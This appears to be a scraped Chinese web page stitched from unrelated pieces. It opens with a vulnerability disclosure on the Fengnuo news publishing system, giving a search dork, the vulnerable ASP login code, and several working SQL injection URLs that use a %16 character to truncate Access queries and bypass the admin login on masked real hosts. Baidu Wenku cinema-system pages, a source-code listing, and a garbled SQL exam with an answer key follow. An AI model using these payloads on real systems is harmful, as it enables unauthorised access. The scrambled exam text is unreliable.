分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向第三方安全合作伙伴开放
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
头一次注意到access可以这样截断？
详细说明：
搜索：http://**.**.**.**/search?newwindow=1&q=inurl%3Afunonews.ASP%3FID%3D&btnG=Google+%E6%90%9C%E7%B4%A2
不过有的搜索结果未必是同一套系统。
系统名称应该是叫风诺新闻发布管理系统
北京风诺网络开发
存在注入的链接：
http://**.**.**.**/dzb/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1
漏洞证明：
当判断表名admin的时候返回密码错误，admin1的时候则提示数据库错误
http://**.**.**.**/dzb/admin/chklogin.asp?admin=1'%20and%20exists%20(select%20*%20from%20admin)%20and%20'1'='1&password=1&Submit=%c8%b7%20%b6%a8
http://**.**.**.**/dzb/admin/chklogin.asp?admin=1'%20and%20exists%20(select%20*%20from%20admin1)%20and%20'1'='1&password=1&Submit=%c8%b7%20%b6%a8
用此方法也可以快速判断是否存在注入
因为order by是有4个字段的，直接来吧。
http://**.**.**.**/dzb/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
http://**.**.**.**/yj/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
**.**.**.**:84/huang/nbzy/hjyj/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
http://**.**.**.**/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
http://**.**.**.**/webedit/admin_login.asp
两个admin进入
顺带简单分析一下上面的情况，因为
admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
后面使用了一个%16，使用其它字符的话大部分都无法直接进入系统。
看一下%16是个啥：
看下代码：
code 区域admin1=request(&admin&)
password1=request(&password&)
set rs=server.CreateObject(&ADODB.RecordSet&)
sql=&select * from admin where admin='& & admin1 & &' and password='&&encrypt(password1)&&'&
查询原本拼凑出来的是：
select * from admin where admin=’1' UNION ALL SELECT 123,NULL,NULL,NULL FROM MSysAccessObjects （%16转换为的字符，乌云不让贴） and password=1
在这个地方%16（就是）可以截断access的sql查询！
等同于查询变成了：
select * from admin where admin=’ 1' UNION ALL SELECT 123,NULL,NULL,NULL FROM MSysAccessObjects
因为admin表结构如下：
所以使用了联结查询就等于“查询出了一条数据：id=123其它字段都为空”
后面部分的代码，不多说了没什么特别的
code 区域rs.open sql,conn,1
if rs.eof and rs.bof then
response.write&&SCRIPT language=JavaScript&alert('用户名或密码不正确！');&
response.write&javascript:history.go(-1)&/SCRIPT&&
response.end
session(&admin&)=rs(&admin&)
session(&username&)=rs(&admin&)
session(&userid&)=rs(&id&)
session(&password&)=rs(&password&)
session(&aleave&)=rs(&aleave&)
Session(&eWebEditor_User&) = &admin&
Session(&eWebEditor_Version&) = &2.8.0&
response.redirect &admin.asp&
set rs=nothing
本地测试下：
SELECT * from admin where username='admin' and password='123';
测试2（加了%16字符）：
很明显后面密码的条件已经被截断了。
再测试mysql：
直接报错…………
再测试下mssql：
%16直接被忽视了
所以应该只在access下有效。
不知道是不是之前就有的，才疏学浅现在才知道access可以这样截断
修复方案：
版权声明：转载请注明来源 @
厂商回应：
危害等级：高
漏洞Rank：16
确认时间： 16:45
厂商回复：
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
对大牛就是不一样
@U神 不是大牛，大牛不发这种低级漏洞
第一次听说access截断
第一次听说，标题可以这样写
哇哇哇，access？编码么。
大牛又回来了，嘿嘿 (*^__^*)
@梧桐雨 别大牛了，我这哪里是大牛做的事情啊
这个程序整个都有注入
@wefgod 貌似后台可以shell
用sqlmap看到过%16。。
@ki11y0u 无所谓了，随便搞一个就OK
%16注释,哈哈
sqlmap有%16这个东西。。。。
登录后才能发表评论，请先影院售票管理系统_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
影院售票管理系统
上传于||暂无简介
阅读已结束，如果下载本文需要使用
想免费下载本文？
下载文档到电脑，查找使用更方便
还剩30页未读，继续阅读
你可能喜欢影城在线订票系统毕业设计正文_图文_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
影城在线订票系统毕业设计正文
上传于||文档简介
&&影​城​在​线​订​票​系​统​毕​业​设​计​正​文
阅读已结束，如果下载本文需要使用
想免费下载本文？
下载文档到电脑，查找使用更方便
还剩38页未读，继续阅读
你可能喜欢YXCinema 这是一个电影院购票系统，使用C语言开发，有数据库，很简单 合初步学习 SQL Server 238万源代码下载-
&文件名称: YXCinema
& & & & &&]
&&所属分类:
&&开发工具: C-C++
&&文件大小: 2642 KB
&&上传时间:
&&下载次数: 0
&&提 供 者:
&详细说明：这是一个电影院购票系统，使用C语言开发，有数据库，很简单，适合初步学习-This is a cinema ticketing system, using C language development, there is a , it is simple for a preliminary study
文件列表(点击判断是否您需要的文件，如果是垃圾请在下面评价投诉):
&&51Aspx源码必读.txt&&DB_51aspx&&.........\RAINBOW.mdf&&.........\RAINBOW_log.LDF&&Default.aspx&&Default.aspx.cs&&Global.asax&&Rainbow.sln&&Rainbow.v12.suo&&web.config&&前台&&....\Login.aspx&&....\Login.aspx.cs&&....\MovieDetail.aspx&&....\MovieDetail.aspx.cs&&....\Register.aspx&&....\Register.aspx.cs&&....\image&&....\.....\0.BMP&&....\.....\0.jpg&&....\.....\017q.jpg&&....\.....\1.gif&&....\.....\10.jpg&&....\.....\11.jpg&&....\.....\12.jpg&&....\.....\123.jpg&&....\.....\13.jpg&&....\.....\2.jpg&&....\.....\20.BMP&&....\.....\25.jpg&&....\.....\27.jpg&&....\.....\27080.gif&&....\.....\3.jpg&&....\.....\30.BMP&&....\.....\4.jpg&&....\.....\40.BMP&&....\.....\5.jpg&&....\.....\6.jpg&&....\.....\7.jpg&&....\.....\7080.gif&&....\.....\8.jpg&&....\.....\9.jpg&&....\.....\DSC00448.jpg&&....\.....\black 2.jpg&&....\.....\black.jpg&&....\.....\black1.jpg&&....\.....\black1.png&&....\.....\cash.jpg&&....\.....\eric1.JPG&&....\.....\mastercard.gif&&....\.....\toolbar.jpg&&....\.....\visa.gif&&....\.....\动作片.jpg&&....\.....\喜剧片.jpg&&....\.....\惊悚片.jpg&&....\.....\文艺片.jpg&&....\下单.aspx&&....\下单.aspx.cs&&....\修改信息.aspx&&....\修改信息.aspx.cs&&....\反馈.aspx&&....\反馈.aspx.cs&&....\热门.aspx&&....\热门.aspx.cs&&....\电影分类.aspx&&....\电影分类.aspx.cs&&....\账户充值.aspx&&....\账户充值.aspx.cs&&....\账户详细.aspx&&....\账户详细.aspx.cs&&....\购物车.aspx&&....\购物车.aspx.cs&&....\预告.aspx&&....\预告.aspx.cs&&....\首页.aspx&&....\首页.aspx.cs&&后台&&....\反馈信息.aspx&&....\反馈信息.aspx.cs&&....\员工登陆.aspx&&....\员工登陆.aspx.cs&&....\管理员工作界面.aspx&&....\管理员工作界面.aspx.cs&&....\门票对兑.aspx&&....\门票对兑.aspx.cs&&....\门票销售情况.aspx&&....\门票销售情况.aspx.cs
&输入关键字，在本站238万海量源码库中尽情搜索：SQL数据库系统及应用~试题一套~~求高手解答！！_百度知道
SQL数据库系统及应用~试题一套~~求高手解答！！
分8。）V 1，可用（ ）命令一. 正确
在INSERT语句中、MAX。）V 1，则不能用DML语句通过视图操纵数据.
在SELECT语句中，保存着每个数据库对象的信息的系统表是（ ），扩展名ldfA. uniqueD，共 50 分。A. 错误B：5
分5. GROUP BY… HAVINGD. 错误B，储户能够在多个储蓄所存取款. 磁盘
SQL Server存储过程能够立即访问数据库. 数值是未知的D。A. SELECT * FROM CP WHERE 产品名称 LIKE ‘冰箱’B，如果出现了“age Between 30 and 40”。A。A.
使用INSERT命令一次只能插入一行数据：5
分6. 错误B.
两个空值相比较的结果是未知. 正确
满分，若要删除表上的视图、判断题（共 10 道试题. 多对多的联系
满分，与该表相关的索引并不被删除. DeleteC。A：5
分9，并且视图中列来自多张表. 正确
如果要在一张管理职工工资的表中限制工资的输入范围. 正确
在存在下列关键字的SQL语句中。A：5
分4、AVG. 日志文件
满分. sysdatabasesB;30 or age&lt. 错误B;=40C. HAVINGC：5
由于索引是独立的. 正确
满分. 索引文件C. SyscolumnsC. SysobjectsD。A. 数据文件B。A.
储蓄所有多个储户. InsertD。A。A，删除表时. Syslogs
满分. 错误B. 数值为空格C;=30 and age&lt. SELECT * FROM CP WHERE 产品名称=‘冰箱’
在查询语句的Where子句中.
要查询XSH数据库CP表中产品名含有“冰箱”的产品情况. age&gt，还记录着存储过程中每个参数的信息. FOREIGN KEYC。A.
记录数据库事务操作信息的文件是（ ）. 正确
满分. 错误B，应使用（ ）约束：5
数据库的数据一般存放在（ ）中;=30 or age&lt. CPUC. 内存B;40D，也可以拥有多个日志文件，必须通过使用DROP VIEW手工删除. check
满分，不可能出现Where子句的是（ ）：5
已使用DROP TABLE除去删除表：5
分10;30 and age&lt. UpdateB、MIN不允许出现在查询语句的（ ）子句之中，一定要使用GROUP BY子句、单选题（共 10 道试题;=40B：5
分10. age&gt，储蓄所与储户之间是（ ）. 错误B。A，当使用ORDER BY子句时. 正确
满分，每个数据库至少拥有一个日志文件.
在sysdatabases中、SUM。A. SELECTB。A，则说明这一列（ ）。A. 一对一的联系B. SELECT * FROM XSH WHERE 产品名称 LIKE ‘冰箱’C：5
分4. 错误B。A，表达式的数据类型必须可以和表格中对应各列的数据类型兼容。A. 错误B. age&gt. SELECT * FROM CP WHERE 产品名称 LIKE ‘%冰箱%’D.
列值为空值（NULL）.
如果定义视图的FROM子句包括多张表;40
分7，VALUES列表中的表达式的数量. 多对一的联系D：5
日志文件用于存放恢复数据库用的所有日志信息，必须匹配列表中的列数. 错误B. 一对多的联系C.
SQL的聚集函数COUNT. age&gt. 辅助数据文件D：5
分7. WHERE
满分. 正确
满分. Alter
满分. 寄存器D. PDRIMARY KEYB：5
分3. 不存在
满分,这个表达式等同于（ ）. 数值为0B，共 50 分.
SQL Server中
提问者采纳
1,2,2,3,7,4.B,4,6,9.A.D.D二,5,5.A.6.D.B,10.B.C,3.D,7,9.B.C.D.A,8.D.A.A,10一,8.B自己做着玩的、1.A.C
提问者评价
就错了一道~~谢谢谢谢昂~~
其他类似问题
为您推荐：
sql数据库的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁